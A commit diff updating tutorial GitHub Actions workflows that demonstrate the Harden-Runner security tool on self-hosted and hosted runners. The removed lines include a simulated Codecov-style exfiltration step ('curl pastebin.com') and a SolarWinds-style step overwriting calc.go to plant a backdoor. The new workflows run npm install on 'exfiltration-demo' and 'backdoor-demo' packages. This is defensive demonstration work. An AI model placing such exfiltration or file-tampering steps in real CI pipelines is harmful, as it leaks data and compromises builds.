Update tutorials (step-security#151)

Author: varunsh-coder

.github/workflows/arc-codecov-simulation.yml

@@ -1,9 +1,9 @@
-name: 3. ARC Codecov Simulation
+name: "ARC: Network Filtering with Harden-Runner"
 on:
   workflow_dispatch:
-      
+
 jobs:
-  arc-codecov-simulation:
+  build:
     runs-on: self-hosted
     steps:
       - name: Harden Runner
@@ -12,10 +12,26 @@ jobs:
           egress-policy: block
           allowed-endpoints: >
             api.github.com:443
+            *.docker.io:443
+            ghcr.io:443
             github.com:443
-
+            objects.githubusercontent.com:443
+            nodejs.org:443
+            production.cloudflare.docker.com:443
+            registry.npmjs.org:443
       - uses: actions/checkout@v3
-
-      # Codecov Scenario: Exfiltrate data to attacker's endpoint
-      - name: Data Exfiltration To Attacker Controller Endpoint
-        run: curl pastebin.com -L
+      - uses: actions/setup-node@v3
+        with:
+          node-version: 18
+      - name: npm install
+        run: |
+          cd ./src/exfiltration-demo
+          npm install
+      - name: Publish to Registry
+        uses: elgohr/Publish-Docker-Github-Action@v5
+        with:
+          name: ${{ github.repository }}/prod:latest
+          username: ${{ github.actor }}
+          password: ${{ secrets.GITHUB_TOKEN }}
+          registry: ghcr.io
+          workdir: ./src/exfiltration-demo

.github/workflows/arc-secure-by-default.yml

@@ -1,7 +1,7 @@
-name: 2. Secure-By-Default ARC Cluster-Level Policy
+name: "ARC: Secure-By-Default Cluster-Level Policy"
 on:
   workflow_dispatch:
-
+  
 jobs:
   direct-ip-hosted:
     runs-on: ubuntu-latest

.github/workflows/arc-solarwinds-simulation.yml

@@ -1,4 +1,4 @@
-name: 4. ARC SolarWinds Simulation
+name: "ARC: File Monitoring with Harden-Runner"
 on:
   workflow_dispatch:
 
@@ -7,10 +7,18 @@ jobs:
     runs-on: self-hosted
     steps:
       - uses: actions/checkout@v3
-
-      # SolarWinds Scenario: Overwrite calc.go to inject backdoor
-      - name: File Overwrite with mv
+      - uses: actions/setup-node@v3
+        with:
+          node-version: 18
+      - name: npm install
         run: |
-          code='package main\n\nfunc main(){\nprintln("code added")\n}'
-          printf "$code" > calc1.go
-          mv calc1.go calc.go
+          cd ./src/backdoor-demo
+          npm install
+      - name: Publish to Registry
+        uses: elgohr/Publish-Docker-Github-Action@v5
+        with:
+          name: ${{ github.repository }}/prod:latest
+          username: ${{ github.actor }}
+          password: ${{ secrets.GITHUB_TOKEN }}
+          registry: ghcr.io
+          workdir: ./src/backdoor-demo

.github/workflows/arc-zero-effort-observability.yml

@@ -1,14 +1,24 @@
-name: 1. Zero-effort Observability
+name: "ARC: Zero-effort Observability"
 on:
   workflow_dispatch:
 
 jobs:
-  observability:
+  build:
     runs-on: self-hosted
-    permissions:
-      contents: read
     steps:
-      - uses: actions/checkout@v2
-
-      - name: Build Docker image
-        run: docker build .
+      - uses: actions/checkout@v3
+      - uses: actions/setup-node@v3
+        with:
+          node-version: 18
+      - name: npm install
+        run: |
+          cd ./src/exfiltration-demo
+          npm install
+      - name: Publish to Registry
+        uses: elgohr/Publish-Docker-Github-Action@v5
+        with:
+          name: ${{ github.repository }}/prod:latest
+          username: ${{ github.actor }}
+          password: ${{ secrets.GITHUB_TOKEN }}
+          registry: ghcr.io
+          workdir: ./src/exfiltration-demo

.github/workflows/ci.yml

@@ -0,0 +1,24 @@
+name: "Hosted: File Monitoring with Harden-Runner"
+on:
+  workflow_dispatch:
+  
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: step-security/harden-runner@v2
+        with:
+          egress-policy: audit
+      - uses: actions/checkout@v3
+      - name: npm install
+        run: |
+          cd ./src/backdoor-demo
+          npm install 
+      - name: Publish to Registry
+        uses: elgohr/Publish-Docker-Github-Action@v5
+        with:
+          name: ${{ github.repository }}/prod:latest
+          username: ${{ github.actor }}
+          password: ${{ secrets.GITHUB_TOKEN }}
+          registry: ghcr.io
+          workdir: ./src/backdoor-demo

.github/workflows/hosted-file-monitor-with-hr.yml

@@ -0,0 +1,21 @@
+name: "Hosted: File Monitoring without Harden-Runner"
+on:
+  workflow_dispatch:
+
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v3
+      - name: npm install
+        run: |
+          cd ./src/backdoor-demo
+          npm install
+      - name: Publish to Registry
+        uses: elgohr/Publish-Docker-Github-Action@v5
+        with:
+          name: ${{ github.repository }}/prod:latest
+          username: ${{ github.actor }}
+          password: ${{ secrets.GITHUB_TOKEN }}
+          registry: ghcr.io
+          workdir: ./src/backdoor-demo

.github/workflows/hosted-file-monitor-without-hr.yml

@@ -0,0 +1,30 @@
+name: "Hosted: Network Filtering with Harden-Runner"
+on:
+  workflow_dispatch:
+
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Harden Runner
+        uses: step-security/harden-runner@v2
+        with:
+          disable-sudo: true
+          egress-policy: block
+          allowed-endpoints: >
+            ghcr.io:443
+            github.com:443
+            registry.npmjs.org:443
+      - uses: actions/checkout@v3
+      - name: npm install
+        run: |
+          cd ./src/exfiltration-demo
+          npm install
+      - name: Publish to Registry
+        uses: elgohr/Publish-Docker-Github-Action@v5
+        with:
+          name: ${{ github.repository }}/prod:latest
+          username: ${{ github.actor }}
+          password: ${{ secrets.GITHUB_TOKEN }}
+          registry: ghcr.io
+          workdir: ./src/exfiltration-demo

.github/workflows/hosted-network-filtering-hr.yml

@@ -0,0 +1,24 @@
+name: "Hosted: Network Monitoring with Harden-Runner"
+on:
+  workflow_dispatch:
+
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: step-security/harden-runner@v2
+        with:
+          egress-policy: audit
+      - uses: actions/checkout@v3
+      - name: npm install
+        run: |
+          cd ./src/exfiltration-demo
+          npm install
+      - name: Publish to Registry
+        uses: elgohr/Publish-Docker-Github-Action@v5
+        with:
+          name: ${{ github.repository }}/prod:latest
+          username: ${{ github.actor }}
+          password: ${{ secrets.GITHUB_TOKEN }}
+          registry: ghcr.io
+          workdir: ./src/exfiltration-demo

.github/workflows/hosted-network-monitoring-hr.yml

@@ -0,0 +1,21 @@
+name: "Hosted: Network Monitoring without Harden-Runner"
+on:
+  workflow_dispatch:
+
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v3
+      - name: npm install
+        run: |
+          cd ./src/exfiltration-demo
+          npm install
+      - name: Publish to Registry
+        uses: elgohr/Publish-Docker-Github-Action@v5
+        with:
+          name: ${{ github.repository }}/prod:latest
+          username: ${{ github.actor }}
+          password: ${{ secrets.GITHUB_TOKEN }}
+          registry: ghcr.io
+          workdir: ./src/exfiltration-demo